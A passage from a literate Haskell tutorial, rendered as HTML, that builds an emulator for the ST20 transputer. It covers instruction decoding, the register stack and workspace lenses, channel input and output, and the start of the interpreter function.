<span id="cb15-15"><a href="#cb15-15" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">RET</span>   <span class="op">|</span> <span class="dt">GCALL</span>  <span class="op">|</span> <span class="dt">SHR</span></span>
<span id="cb15-16"><a href="#cb15-16" aria-hidden="true" tabindex="-1"></a>            <span class="op">|</span> <span class="dt">SHL</span>   <span class="op">|</span> <span class="dt">REM</span></span>
<span id="cb15-17"><a href="#cb15-17" aria-hidden="true" tabindex="-1"></a>    <span class="kw">deriving</span> (<span class="dt">Eq</span>, <span class="dt">Ord</span>, <span class="dt">Show</span>)</span>
<span id="cb15-18"><a href="#cb15-18" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb15-19"><a href="#cb15-19" aria-hidden="true" tabindex="-1"></a><span class="kw">data</span> <span class="dt">Instr</span> <span class="ot">=</span> <span class="dt">Pri</span> <span class="dt">PInstr</span> <span class="dt">Int32</span></span>
<span id="cb15-20"><a href="#cb15-20" aria-hidden="true" tabindex="-1"></a>           <span class="op">|</span> <span class="dt">Sec</span> <span class="dt">SInstr</span></span>
<span id="cb15-21"><a href="#cb15-21" aria-hidden="true" tabindex="-1"></a>    <span class="kw">deriving</span> (<span class="dt">Eq</span>, <span class="dt">Ord</span>)</span>
<span id="cb15-22"><a href="#cb15-22" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb15-23"><a href="#cb15-23" aria-hidden="true" tabindex="-1"></a><span class="kw">instance</span> <span class="dt">Show</span> <span class="dt">Instr</span> <span class="kw">where</span></span>
<span id="cb15-24"><a href="#cb15-24" aria-hidden="true" tabindex="-1"></a>    <span class="fu">show</span> (<span class="dt">Pri</span> p n) <span class="ot">=</span> <span class="fu">show</span> p <span class="op">++</span> <span class="st">&quot; &quot;</span> <span class="op">++</span> <span class="fu">show</span> n</span>
<span id="cb15-25"><a href="#cb15-25" aria-hidden="true" tabindex="-1"></a>    <span class="fu">show</span> (<span class="dt">Sec</span> s) <span class="ot">=</span> <span class="fu">show</span> s</span></code></pre></div>
<p>Instruction decoding will need to move within the instruction stream, so it is
part of the evaluation monad.</p>
<div class="sourceCode" id="cb16"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb16-1"><a href="#cb16-1" aria-hidden="true" tabindex="-1"></a><span class="ot">decodeInstr ::</span> <span class="dt">Eval</span> <span class="dt">Instr</span></span>
<span id="cb16-2"><a href="#cb16-2" aria-hidden="true" tabindex="-1"></a>decodeInstr <span class="ot">=</span> decodeInstr_ <span class="dv">0</span></span>
<span id="cb16-3"><a href="#cb16-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb16-4"><a href="#cb16-4" aria-hidden="true" tabindex="-1"></a><span class="ot">decodeInstr_ ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> <span class="dt">Instr</span></span>
<span id="cb16-5"><a href="#cb16-5" aria-hidden="true" tabindex="-1"></a>decodeInstr_ acc <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb16-6"><a href="#cb16-6" aria-hidden="true" tabindex="-1"></a>    b <span class="ot">&lt;-</span> peekAndIncr</span>
<span id="cb16-7"><a href="#cb16-7" aria-hidden="true" tabindex="-1"></a>    <span class="kw">let</span> acc&#39; <span class="ot">=</span> acc <span class="op">+</span> <span class="fu">fromIntegral</span> (b <span class="op">.&amp;.</span> <span class="bn">0xf</span>)</span>
<span id="cb16-8"><a href="#cb16-8" aria-hidden="true" tabindex="-1"></a>    <span class="kw">case</span> () <span class="kw">of</span></span>
<span id="cb16-9"><a href="#cb16-9" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x0f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">J</span> acc&#39;</span>
<span id="cb16-10"><a href="#cb16-10" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x1f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">LDLP</span> acc&#39;</span>
<span id="cb16-11"><a href="#cb16-11" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x2f</span> <span class="ot">-&gt;</span> decodeInstr_ <span class="op">$</span> acc&#39; <span class="ot">`shiftL`</span> <span class="dv">4</span></span>
<span id="cb16-12"><a href="#cb16-12" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x3f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">LDNL</span> acc&#39;</span>
<span id="cb16-13"><a href="#cb16-13" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x4f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">LDC</span> acc&#39;</span>
<span id="cb16-14"><a href="#cb16-14" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x5f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">LDNLP</span> acc&#39;</span>
<span id="cb16-15"><a href="#cb16-15" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x6f</span> <span class="ot">-&gt;</span> decodeInstr_ <span class="op">$</span> complement acc&#39; <span class="ot">`shiftL`</span> <span class="dv">4</span></span>
<span id="cb16-16"><a href="#cb16-16" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x7f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">LDL</span> acc&#39;</span>
<span id="cb16-17"><a href="#cb16-17" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x8f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">ADC</span> acc&#39;</span>
<span id="cb16-18"><a href="#cb16-18" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0x9f</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">CALL</span> acc&#39;</span>
<span id="cb16-19"><a href="#cb16-19" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0xaf</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">CJ</span> acc&#39;</span>
<span id="cb16-20"><a href="#cb16-20" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0xbf</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">AJW</span> acc&#39;</span>
<span id="cb16-21"><a href="#cb16-21" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0xcf</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">EQC</span> acc&#39;</span>
<span id="cb16-22"><a href="#cb16-22" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0xdf</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">STL</span> acc&#39;</span>
<span id="cb16-23"><a href="#cb16-23" aria-hidden="true" tabindex="-1"></a>        _ <span class="op">|</span> b <span class="op">&lt;=</span> <span class="bn">0xef</span> <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Pri</span> <span class="dt">STNL</span> acc&#39;</span>
<span id="cb16-24"><a href="#cb16-24" aria-hidden="true" tabindex="-1"></a>        _             <span class="ot">-&gt;</span> <span class="fu">return</span> <span class="op">$</span> <span class="dt">Sec</span> <span class="op">$</span> parseSecondary acc&#39;</span>
<span id="cb16-25"><a href="#cb16-25" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb16-26"><a href="#cb16-26" aria-hidden="true" tabindex="-1"></a><span class="ot">peekAndIncr ::</span> <span class="dt">Eval</span> <span class="dt">Word8</span></span>
<span id="cb16-27"><a href="#cb16-27" aria-hidden="true" tabindex="-1"></a>peekAndIncr <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb16-28"><a href="#cb16-28" aria-hidden="true" tabindex="-1"></a>    addr <span class="ot">&lt;-</span> use iptr</span>
<span id="cb16-29"><a href="#cb16-29" aria-hidden="true" tabindex="-1"></a>    b <span class="ot">&lt;-</span> use (memByte addr)</span>
<span id="cb16-30"><a href="#cb16-30" aria-hidden="true" tabindex="-1"></a>    iptr <span class="op">+=</span> <span class="dv">1</span></span>
<span id="cb16-31"><a href="#cb16-31" aria-hidden="true" tabindex="-1"></a>    <span class="fu">return</span> b</span>
<span id="cb16-32"><a href="#cb16-32" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb16-33"><a href="#cb16-33" aria-hidden="true" tabindex="-1"></a><span class="ot">parseSecondary ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">SInstr</span></span>
<span id="cb16-34"><a href="#cb16-34" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x01</span> <span class="ot">=</span> <span class="dt">LB</span></span>
<span id="cb16-35"><a href="#cb16-35" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x02</span> <span class="ot">=</span> <span class="dt">BSUB</span></span>
<span id="cb16-36"><a href="#cb16-36" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x06</span> <span class="ot">=</span> <span class="dt">GCALL</span></span>
<span id="cb16-37"><a href="#cb16-37" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x07</span> <span class="ot">=</span> <span class="dt">IN</span></span>
<span id="cb16-38"><a href="#cb16-38" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x08</span> <span class="ot">=</span> <span class="dt">PROD</span></span>
<span id="cb16-39"><a href="#cb16-39" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x09</span> <span class="ot">=</span> <span class="dt">GTx</span></span>
<span id="cb16-40"><a href="#cb16-40" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x0a</span> <span class="ot">=</span> <span class="dt">WSUB</span></span>
<span id="cb16-41"><a href="#cb16-41" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x0b</span> <span class="ot">=</span> <span class="dt">OUT</span></span>
<span id="cb16-42"><a href="#cb16-42" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x1b</span> <span class="ot">=</span> <span class="dt">LDPI</span></span>
<span id="cb16-43"><a href="#cb16-43" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x1f</span> <span class="ot">=</span> <span class="dt">REM</span></span>
<span id="cb16-44"><a href="#cb16-44" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x20</span> <span class="ot">=</span> <span class="dt">RET</span></span>
<span id="cb16-45"><a href="#cb16-45" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x33</span> <span class="ot">=</span> <span class="dt">XOR</span></span>
<span id="cb16-46"><a href="#cb16-46" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x3b</span> <span class="ot">=</span> <span class="dt">SB</span></span>
<span id="cb16-47"><a href="#cb16-47" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x3c</span> <span class="ot">=</span> <span class="dt">GAJW</span></span>
<span id="cb16-48"><a href="#cb16-48" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x40</span> <span class="ot">=</span> <span class="dt">SHR</span></span>
<span id="cb16-49"><a href="#cb16-49" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x41</span> <span class="ot">=</span> <span class="dt">SHL</span></span>
<span id="cb16-50"><a href="#cb16-50" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x42</span> <span class="ot">=</span> <span class="dt">MINT</span></span>
<span id="cb16-51"><a href="#cb16-51" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x46</span> <span class="ot">=</span> <span class="dt">AND</span></span>
<span id="cb16-52"><a href="#cb16-52" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0x5a</span> <span class="ot">=</span> <span class="dt">DUP</span></span>
<span id="cb16-53"><a href="#cb16-53" aria-hidden="true" tabindex="-1"></a>parseSecondary <span class="bn">0xc1</span> <span class="ot">=</span> <span class="dt">SSUB</span></span>
<span id="cb16-54"><a href="#cb16-54" aria-hidden="true" tabindex="-1"></a>parseSecondary b <span class="ot">=</span> <span class="fu">error</span> <span class="op">$</span> <span class="st">&quot;Unknown secondary 0x&quot;</span> <span class="op">++</span> showHex b <span class="st">&quot;&quot;</span></span></code></pre></div>
<h2 id="the-two-stacks">The two stacks</h2>
<p>Data is manipulated using two different mechanisms: the integer stack and the
workspace.</p>
<p>The integer stack is a set of three registers: <code>A</code>, <code>B</code>, and <code>C</code>, which can be
used as a stack using these operations. Actually, it can only be manipulated
through push and pop operations, so we represent this using a list.</p>
<p>The instruction set reference says that an undefined value will be popped if the
stack is empty; here we consider that this will not happen, and allow a partial
pattern matching.</p>
<div class="sourceCode" id="cb17"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb17-1"><a href="#cb17-1" aria-hidden="true" tabindex="-1"></a><span class="ot">pushInt ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> ()</span>
<span id="cb17-2"><a href="#cb17-2" aria-hidden="true" tabindex="-1"></a>pushInt n <span class="ot">=</span></span>
<span id="cb17-3"><a href="#cb17-3" aria-hidden="true" tabindex="-1"></a>    intStack <span class="op">%=</span> (n<span class="op">:</span>)</span>
<span id="cb17-4"><a href="#cb17-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-5"><a href="#cb17-5" aria-hidden="true" tabindex="-1"></a><span class="ot">popInt ::</span> <span class="dt">Eval</span> <span class="dt">Int32</span></span>
<span id="cb17-6"><a href="#cb17-6" aria-hidden="true" tabindex="-1"></a>popInt <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb17-7"><a href="#cb17-7" aria-hidden="true" tabindex="-1"></a>    (h<span class="op">:</span>t) <span class="ot">&lt;-</span> use intStack</span>
<span id="cb17-8"><a href="#cb17-8" aria-hidden="true" tabindex="-1"></a>    intStack <span class="op">.=</span> t</span>
<span id="cb17-9"><a href="#cb17-9" aria-hidden="true" tabindex="-1"></a>    <span class="fu">return</span> h</span>
<span id="cb17-10"><a href="#cb17-10" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb17-11"><a href="#cb17-11" aria-hidden="true" tabindex="-1"></a><span class="ot">popAll ::</span> <span class="dt">Eval</span> (<span class="dt">Int32</span>, <span class="dt">Int32</span>, <span class="dt">Int32</span>)</span>
<span id="cb17-12"><a href="#cb17-12" aria-hidden="true" tabindex="-1"></a>popAll <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb17-13"><a href="#cb17-13" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> popInt</span>
<span id="cb17-14"><a href="#cb17-14" aria-hidden="true" tabindex="-1"></a>    b <span class="ot">&lt;-</span> popInt</span>
<span id="cb17-15"><a href="#cb17-15" aria-hidden="true" tabindex="-1"></a>    c <span class="ot">&lt;-</span> popInt</span>
<span id="cb17-16"><a href="#cb17-16" aria-hidden="true" tabindex="-1"></a>    <span class="fu">return</span> (a, b, c)</span></code></pre></div>
<p>Only the head (<code>A</code>) can be directly accessed, so we first define a lens between
a list and its head, and compose it with <code>intStack</code>.</p>
<div class="sourceCode" id="cb18"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb18-1"><a href="#cb18-1" aria-hidden="true" tabindex="-1"></a><span class="ot">headLens ::</span> <span class="dt">Lens&#39;</span> [a] a</span>
<span id="cb18-2"><a href="#cb18-2" aria-hidden="true" tabindex="-1"></a>headLens <span class="ot">=</span> lens <span class="fu">head</span> <span class="op">$</span> \ l x <span class="ot">-&gt;</span> x<span class="op">:</span><span class="fu">tail</span> l</span>
<span id="cb18-3"><a href="#cb18-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb18-4"><a href="#cb18-4" aria-hidden="true" tabindex="-1"></a><span class="ot">areg ::</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> <span class="dt">Int32</span></span>
<span id="cb18-5"><a href="#cb18-5" aria-hidden="true" tabindex="-1"></a>areg <span class="ot">=</span> intStack <span class="op">.</span> headLens</span></code></pre></div>
<p>The workspace is a place in memory (pointed to by a register <code>wptr</code>) where local
variables can be stored and loaded, a bit like a stack pointer. We first define
push and pop operations.</p>
<div class="sourceCode" id="cb19"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb19-1"><a href="#cb19-1" aria-hidden="true" tabindex="-1"></a><span class="ot">pushWorkspace ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> ()</span>
<span id="cb19-2"><a href="#cb19-2" aria-hidden="true" tabindex="-1"></a>pushWorkspace value <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb19-3"><a href="#cb19-3" aria-hidden="true" tabindex="-1"></a>    wptr <span class="op">-=</span> <span class="dv">4</span></span>
<span id="cb19-4"><a href="#cb19-4" aria-hidden="true" tabindex="-1"></a>    var <span class="dv">0</span> <span class="op">.=</span> value</span>
<span id="cb19-5"><a href="#cb19-5" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb19-6"><a href="#cb19-6" aria-hidden="true" tabindex="-1"></a><span class="ot">popWorkspace ::</span> <span class="dt">Eval</span> <span class="dt">Int32</span></span>
<span id="cb19-7"><a href="#cb19-7" aria-hidden="true" tabindex="-1"></a>popWorkspace <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb19-8"><a href="#cb19-8" aria-hidden="true" tabindex="-1"></a>    w <span class="ot">&lt;-</span> use <span class="op">$</span> var <span class="dv">0</span></span>
<span id="cb19-9"><a href="#cb19-9" aria-hidden="true" tabindex="-1"></a>    wptr <span class="op">+=</span> <span class="dv">4</span></span>
<span id="cb19-10"><a href="#cb19-10" aria-hidden="true" tabindex="-1"></a>    <span class="fu">return</span> w</span></code></pre></div>
<p>Then we define a lens to focus on a variable.</p>
<div class="sourceCode" id="cb20"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb20-1"><a href="#cb20-1" aria-hidden="true" tabindex="-1"></a><span class="ot">var ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> <span class="dt">Int32</span></span>
<span id="cb20-2"><a href="#cb20-2" aria-hidden="true" tabindex="-1"></a>var n <span class="ot">=</span></span>
<span id="cb20-3"><a href="#cb20-3" aria-hidden="true" tabindex="-1"></a>    lens getVar setVar</span>
<span id="cb20-4"><a href="#cb20-4" aria-hidden="true" tabindex="-1"></a>        <span class="kw">where</span></span>
<span id="cb20-5"><a href="#cb20-5" aria-hidden="true" tabindex="-1"></a>            varLens s <span class="ot">=</span> memWord ((s <span class="op">^.</span> wptr) <span class="op">@@</span> n)</span>
<span id="cb20-6"><a href="#cb20-6" aria-hidden="true" tabindex="-1"></a>            getVar s <span class="ot">=</span> s <span class="op">^.</span> varLens s</span>
<span id="cb20-7"><a href="#cb20-7" aria-hidden="true" tabindex="-1"></a>            setVar s v <span class="ot">=</span> set (varLens s) v s</span></code></pre></div>
<h2 id="input-and-output">Input and output</h2>
<p>The main particularity of the ST20 architecture is that it has hardware support
of message channels. They map fairly naturally to <code>Control.Concurrent.Chan</code>
channels. Each ST20 thread will have a map from channel numbers to input or
output channels:</p>
<div class="sourceCode" id="cb21"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb21-1"><a href="#cb21-1" aria-hidden="true" tabindex="-1"></a><span class="ot">getXChan ::</span> (<span class="dt">EvalEnv</span> <span class="ot">-&gt;</span> [(<span class="dt">Int32</span>, a)]) <span class="ot">-&gt;</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">EvalEnv</span> <span class="ot">-&gt;</span> a</span>
<span id="cb21-2"><a href="#cb21-2" aria-hidden="true" tabindex="-1"></a>getXChan member w st <span class="ot">=</span></span>
<span id="cb21-3"><a href="#cb21-3" aria-hidden="true" tabindex="-1"></a>    fromJust <span class="op">$</span> <span class="fu">lookup</span> w <span class="op">$</span> member st</span>
<span id="cb21-4"><a href="#cb21-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb21-5"><a href="#cb21-5" aria-hidden="true" tabindex="-1"></a><span class="ot">getIChan ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">EvalEnv</span> <span class="ot">-&gt;</span> <span class="dt">IChannel</span></span>
<span id="cb21-6"><a href="#cb21-6" aria-hidden="true" tabindex="-1"></a>getIChan <span class="ot">=</span> getXChan envInChans</span>
<span id="cb21-7"><a href="#cb21-7" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb21-8"><a href="#cb21-8" aria-hidden="true" tabindex="-1"></a><span class="ot">getOChan ::</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">EvalEnv</span> <span class="ot">-&gt;</span> <span class="dt">OChannel</span></span>
<span id="cb21-9"><a href="#cb21-9" aria-hidden="true" tabindex="-1"></a>getOChan <span class="ot">=</span> getXChan envOutChans</span></code></pre></div>
<p>And these channels can be either a <code>Chan Word8</code> or a plain <code>Handle</code>, to connect
a thread to the process’ standard input and output.</p>
<div class="sourceCode" id="cb22"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb22-1"><a href="#cb22-1" aria-hidden="true" tabindex="-1"></a><span class="ot">readFromIChan ::</span> <span class="dt">IChannel</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> [<span class="dt">Word8</span>]</span>
<span id="cb22-2"><a href="#cb22-2" aria-hidden="true" tabindex="-1"></a>readFromIChan (<span class="dt">InChan</span> chan) n <span class="ot">=</span></span>
<span id="cb22-3"><a href="#cb22-3" aria-hidden="true" tabindex="-1"></a>    liftIO <span class="op">$</span> <span class="fu">mapM</span> (\ _ <span class="ot">-&gt;</span> readChan chan) [<span class="dv">1</span><span class="op">..</span>n]</span>
<span id="cb22-4"><a href="#cb22-4" aria-hidden="true" tabindex="-1"></a>readFromIChan (<span class="dt">InHandle</span> h) n <span class="ot">=</span></span>
<span id="cb22-5"><a href="#cb22-5" aria-hidden="true" tabindex="-1"></a>    liftIO <span class="op">$</span> <span class="kw">do</span></span>
<span id="cb22-6"><a href="#cb22-6" aria-hidden="true" tabindex="-1"></a>        bs <span class="ot">&lt;-</span> BS.hGet h <span class="op">$</span> <span class="fu">fromIntegral</span> n</span>
<span id="cb22-7"><a href="#cb22-7" aria-hidden="true" tabindex="-1"></a>        <span class="fu">return</span> <span class="op">$</span> BS.unpack bs</span>
<span id="cb22-8"><a href="#cb22-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb22-9"><a href="#cb22-9" aria-hidden="true" tabindex="-1"></a><span class="ot">writeToOChan ::</span> <span class="dt">OChannel</span> <span class="ot">-&gt;</span> [<span class="dt">Word8</span>] <span class="ot">-&gt;</span> <span class="dt">Eval</span> ()</span>
<span id="cb22-10"><a href="#cb22-10" aria-hidden="true" tabindex="-1"></a>writeToOChan (<span class="dt">OutChan</span> chan) ws <span class="ot">=</span></span>
<span id="cb22-11"><a href="#cb22-11" aria-hidden="true" tabindex="-1"></a>    liftIO <span class="op">$</span> writeList2Chan chan ws</span>
<span id="cb22-12"><a href="#cb22-12" aria-hidden="true" tabindex="-1"></a>writeToOChan (<span class="dt">OutHandle</span> h) ws <span class="ot">=</span></span>
<span id="cb22-13"><a href="#cb22-13" aria-hidden="true" tabindex="-1"></a>    liftIO <span class="op">$</span> <span class="kw">do</span></span>
<span id="cb22-14"><a href="#cb22-14" aria-hidden="true" tabindex="-1"></a>        BS.hPutStr h <span class="op">$</span> BS.pack ws</span>
<span id="cb22-15"><a href="#cb22-15" aria-hidden="true" tabindex="-1"></a>        hFlush h</span></code></pre></div>
<h2 id="a-few-combinators">A few combinators</h2>
<p>We first define a few combinators that will help us define the <code>interpret</code>
function.</p>
<p>Pop two operands, and push the result:</p>
<div class="sourceCode" id="cb23"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb23-1"><a href="#cb23-1" aria-hidden="true" tabindex="-1"></a><span class="ot">liftOp ::</span> (<span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span>) <span class="ot">-&gt;</span> <span class="dt">Eval</span> ()</span>
<span id="cb23-2"><a href="#cb23-2" aria-hidden="true" tabindex="-1"></a>liftOp op <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb23-3"><a href="#cb23-3" aria-hidden="true" tabindex="-1"></a>    a <span class="ot">&lt;-</span> popInt</span>
<span id="cb23-4"><a href="#cb23-4" aria-hidden="true" tabindex="-1"></a>    b <span class="ot">&lt;-</span> popInt</span>
<span id="cb23-5"><a href="#cb23-5" aria-hidden="true" tabindex="-1"></a>    pushInt <span class="op">$</span> op a b</span></code></pre></div>
<p>Exchange two registers:</p>
<div class="sourceCode" id="cb24"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb24-1"><a href="#cb24-1" aria-hidden="true" tabindex="-1"></a><span class="ot">xchg ::</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Lens&#39;</span> <span class="dt">EvalState</span> <span class="dt">Int32</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> ()</span>
<span id="cb24-2"><a href="#cb24-2" aria-hidden="true" tabindex="-1"></a>xchg l1 l2 <span class="ot">=</span> <span class="kw">do</span></span>
<span id="cb24-3"><a href="#cb24-3" aria-hidden="true" tabindex="-1"></a>  x1 <span class="ot">&lt;-</span> use l1</span>
<span id="cb24-4"><a href="#cb24-4" aria-hidden="true" tabindex="-1"></a>  x2 <span class="ot">&lt;-</span> use l2</span>
<span id="cb24-5"><a href="#cb24-5" aria-hidden="true" tabindex="-1"></a>  l1 <span class="op">.=</span> x2</span>
<span id="cb24-6"><a href="#cb24-6" aria-hidden="true" tabindex="-1"></a>  l2 <span class="op">.=</span> x1</span></code></pre></div>
<p>Convert a boolean to an integer:</p>
<div class="sourceCode" id="cb25"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb25-1"><a href="#cb25-1" aria-hidden="true" tabindex="-1"></a><span class="ot">fromBool ::</span> <span class="dt">Bool</span> <span class="ot">-&gt;</span> <span class="dt">Int32</span></span>
<span id="cb25-2"><a href="#cb25-2" aria-hidden="true" tabindex="-1"></a>fromBool <span class="dt">False</span> <span class="ot">=</span> <span class="dv">0</span></span>
<span id="cb25-3"><a href="#cb25-3" aria-hidden="true" tabindex="-1"></a>fromBool <span class="dt">True</span> <span class="ot">=</span> <span class="dv">1</span></span></code></pre></div>
<h2 id="the-interpret-function">The <code>interpret</code> function</h2>
<p>The core of the interpreter is the following function. It takes an instruction
and transforms it into a monadic action in <code>Eval</code>.</p>
<div class="sourceCode" id="cb26"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb26-1"><a href="#cb26-1" aria-hidden="true" tabindex="-1"></a><span class="ot">interpret ::</span> <span class="dt">Instr</span> <span class="ot">-&gt;</span> <span class="dt">Eval</span> ()</span></code></pre></div>
<p>Some cases are very simple.</p>
<div class="sourceCode" id="cb27"><pre class="sourceCode haskell literate"><code class="sourceCode haskell"><span id="cb27-1"><a href="#cb27-1" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">AJW</span> n) <span class="ot">=</span> wptr <span class="op">+=</span> <span class="dv">4</span> <span class="op">*</span> n</span>
<span id="cb27-2"><a href="#cb27-2" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">LDNLP</span> n) <span class="ot">=</span> areg <span class="op">+=</span> <span class="dv">4</span> <span class="op">*</span> n</span>
<span id="cb27-3"><a href="#cb27-3" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">J</span> n) <span class="ot">=</span> iptr <span class="op">+=</span> n</span>
<span id="cb27-4"><a href="#cb27-4" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Pri</span> <span class="dt">LDC</span> n) <span class="ot">=</span> pushInt n</span>
<span id="cb27-5"><a href="#cb27-5" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">MINT</span>) <span class="ot">=</span> pushInt <span class="bn">0x80000000</span></span>
<span id="cb27-6"><a href="#cb27-6" aria-hidden="true" tabindex="-1"></a>interpret (<span class="dt">Sec</span> <span class="dt">GAJW</span>) <span class="ot">=</span> xchg areg wptr</span>
